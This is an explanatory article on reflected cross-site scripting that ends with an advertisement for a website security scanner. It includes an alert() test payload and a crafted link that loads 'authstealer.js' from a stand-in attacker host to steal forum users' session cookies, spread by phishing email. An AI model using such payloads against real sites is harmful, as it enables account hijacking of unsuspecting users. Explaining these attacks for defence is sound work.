Reflected attacks occur when the injected script is reflected off the webserver, for example, in an error message, search result, or any other response that contains some or all of the input supplied to the server as part of the request. Reflected assaults are provided to victims through another channel, such as an e-mail message or another website. When a user is duped into clicking on a malicious link, submitting a specially designed form, or just navigating to a malicious site, the injected code goes to the susceptible website, reflecting the attack back to the user’s browser. Because the code originated from a “trusted” server, the browser runs it. Non-Persistent or Type-II XSS is another name for Reflected XSS.
While visiting a forum site that requires users to log in to their account, a perpetrator executes this search query <script type=’text/javascript’>alert(‘xss’);</script> causing the following things to occur:
- The query generates an alert box that says: “XSS”.
- The page displays: “<script type=’text/javascript’>alert(‘XSS’);</script > not found.”
- The page’s URL reads http://ecommerce.com?q=<script type=”text/javascript”>alert(‘XSS’); </script>.
This informs the attacker that the website is insecure. He then generates his own URL. , which reads http://forum.com?q=news<\script%20src=”http://hackersite.com/authstealer.js” then inserts it as a link into an apparently innocuous email he sends to a group of forum participants.
While the sender address and topic line may look suspicious to some, this does not exclude it from being clicked on.
In fact, even if just one out of every 1,000 email recipients clicks on the link, it still equates to a few dozen infected forum participants. They will be sent to the forum’s website, where the malicious script will be mirrored back to their browser, allowing the attacker to steal their session cookies and hijack their forum accounts.
ZOFixer.com security scan helps to find this vulnerability in your software and server, you can easily use it by registering on our website and activating the 30-day trial.